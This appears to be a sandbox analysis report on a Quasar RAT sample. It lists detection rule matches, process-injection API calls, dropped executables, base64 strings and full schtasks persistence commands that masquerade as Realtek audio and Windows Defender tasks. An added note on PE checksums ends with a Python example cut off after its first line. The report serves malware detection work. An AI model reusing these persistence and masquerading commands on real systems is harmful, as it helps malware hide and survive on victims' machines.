                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C7B11C GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,GetLastError,CloseHandle,GetKeyState,ExitWindowsEx,5_2_00C7B11C
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: String function: 00A68900 appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00DD37CB appears 38 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00DD8900 appears 49 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 00DE1940 appears 33 times
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: String function: 004034E4 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB318A NtWow64QueryInformationProcess64,GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,4_2_00AB318A
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB2591 NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,4_2_00AB2591
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB27FB NtUnmapViewOfSection,RtlNtStatusToDosError,4_2_00AB27FB
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB27C1 NtMapViewOfSection,RtlNtStatusToDosError,4_2_00AB27C1
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64,4_2_00AB31D4
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree,4_2_00AB3509
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,4_2_00AB2ED8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory,4_2_00AB2B39
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB126D NtQueryVirtualMemory,4_2_00AB126D
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,5_2_00C64CC8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory,5_2_00C64854
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,5_2_00C63450
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA,5_2_00C6502C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation,5_2_00C82AC8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError,5_2_00C636F8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError,5_2_00C6528C
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError,5_2_00C652A4
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError,5_2_00C636A8
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount,5_2_00C82E70
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,5_2_00C64634
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy,5_2_00C83FCC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree,5_2_00C803EC
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: CVbJSUXraQ.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File created: C:\Users\user\btpanui
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: winsock.exe.6.dr, u1802???????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E1A06A GetLastError,FormatMessageW,1_2_00E1A06A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00DB4E89
Source: CVbJSUXraQ.exe | Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe | Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe | ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File read: C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,1_2_00E13C55
Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs | Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs | Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs | Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\windef.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: CVbJSUXraQ.exe | Static file information: File size 2111264 > 1048576
Source: CVbJSUXraQ.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CVbJSUXraQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: CVbJSUXraQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DD8945 push ecx; ret 1_2_00DD8958
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00AB103B push ecx; ret 4_2_00AB104B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ABE0BC push ecx; ret 4_2_00ABE0CC
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ADEAA9 push cs; iretd 4_2_00ADEAB8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ADEA73 push cs; ret 4_2_00ADEA88
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Code function: 4_2_00ADE3DD push es; iretd 4_2_00ADE3EC
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00CA2D0C push ecx; ret 5_2_00CA2D1C
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Code function: 6_2_00F125B2 push esi; ret 6_2_00F125CF
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DD8945 push ecx; ret 7_2_00DD8958
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC4257 push edi; ret 7_2_00DC4259
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00DC426B push edi; ret 7_2_00DC426D
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041A068 push 0041A08Eh; ret 7_2_0041A086
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041A02C push 0041A05Ch; ret 7_2_0041A054
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040E8D0 push 0040E905h; ret 7_2_0040E8FD
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040B164 push 0040B190h; ret 7_2_0040B188
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040E908 push 0040E94Ah; ret 7_2_0040E942
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040B12C push 0040B158h; ret 7_2_0040B150
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040C136 push 0040C164h; ret 7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040C138 push 0040C164h; ret 7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040813C push 00408174h; ret 7_2_0040816C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_004171E8 push 00417214h; ret 7_2_0041720C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040C9EA push 0040CA18h; ret 7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040C9EC push 0040CA18h; ret 7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040E1A4 push 0040E1D0h; ret 7_2_0040E1C8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040B1B8 push 0040B1E4h; ret 7_2_0040B1DC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040E25A push 0040E288h; ret 7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040E25C push 0040E288h; ret 7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00414A28 push 00414A84h; ret 7_2_00414A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0040BAB8 push 0040BAE4h; ret 7_2_0040BADC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00409B54 push 00409BC8h; ret 7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00409B78 push 00409BC8h; ret 7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,1_2_00DB4B37
Source: windef.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr | Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr | Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr | Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe | Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x657b3
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeFile created: C:\Users\user\AppData\Local\Temp\vnc.exe
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeFile created: C:\Users\user\AppData\Local\Temp\windef.exe
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeFile created: C:\Users\user\AppData\Roaming\SubDir\winsock.exeJump to dropped file
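The six "real checksum ... should be" entries above are the sandbox recomputing the PE CheckSum field: on windef.exe, winsock.exe and both vnc.exe copies the header field is 0 (never set by the linker, or the file was built by a packer that skips it), and on the two AutoIt-wrapped executables the stored value is stale. A mismatch is not proof of malice (many legitimate, unsigned builds ship with a zero checksum), but a zero or wrong checksum on a file that claims to be a Microsoft or Realtek component is a cheap triage signal. The following is an added example, not part of this report and not Joe Sandbox code, that reproduces the check offline: it implements the Windows PE checksum (ones'-complement sum of 16-bit words, skipping the CheckSum field itself, folded to 16 bits, plus the file size), locates the field through e_lfanew, and compares. The PE buffer it runs on is constructed inline; the names `build_sample_pe`, `pe_checksum`, `check_pe_checksum` and `set_checksum` are chosen here.

```python
import struct

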